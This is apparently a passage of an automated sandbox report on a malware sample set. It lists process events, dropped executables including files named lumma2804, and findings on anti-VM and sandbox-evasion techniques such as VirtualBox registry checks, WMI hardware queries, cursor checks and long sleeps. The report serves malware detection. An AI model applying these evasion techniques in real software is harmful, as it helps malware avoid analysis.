Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: pRIMqfuwRZ49ldgjUZ_z2py6.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Found API chain indicative of sandbox detection

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Sandbox detection routine: GetCursorPos, DecisionNode, Sleep

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Stalling execution: Execution stalls by calling Sleep

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3124005026.0000000000C1A000.00000020.00000001.01000000.00000010.sdmp	Binary or memory string: R.SBIEDLL.DLL>3
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3124005026.0000000000C1A000.00000020.00000001.01000000.00000010.sdmp	Binary or memory string: R.SBIEDLL.DLL
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory allocated: 16F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory allocated: 3500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory allocated: 3250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Memory allocated: 1C57B8A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Memory allocated: 1C57B8A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2910000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos,

7_2_0045D9F0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Window / User API: threadDelayed 588			Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Window / User API: threadDelayed 9258

Found decision node followed by non-executed suspicious APIs

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-7LPN0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-T59CT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\openh264.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\QtAVWidgets1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcr120.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-280SC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Dropped PE file which has not been started: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OPKFD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-FREGM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-ETDPI.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlx[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libcurl.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-8REGQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libmp3lame.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Svg.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-0CK56.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Dropped PE file which has not been started: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-V4HAL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\mousehelper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\avdevice-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-G7OJ6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HPQQQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-PT3AE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp120.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HBU3P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OFQC1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-5QCAU.tmp	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7336	Thread sleep count: 588 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7336	Thread sleep time: -117600s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7384	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe TID: 7704	Thread sleep count: 220 > 30	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe TID: 7716	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe TID: 7996	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
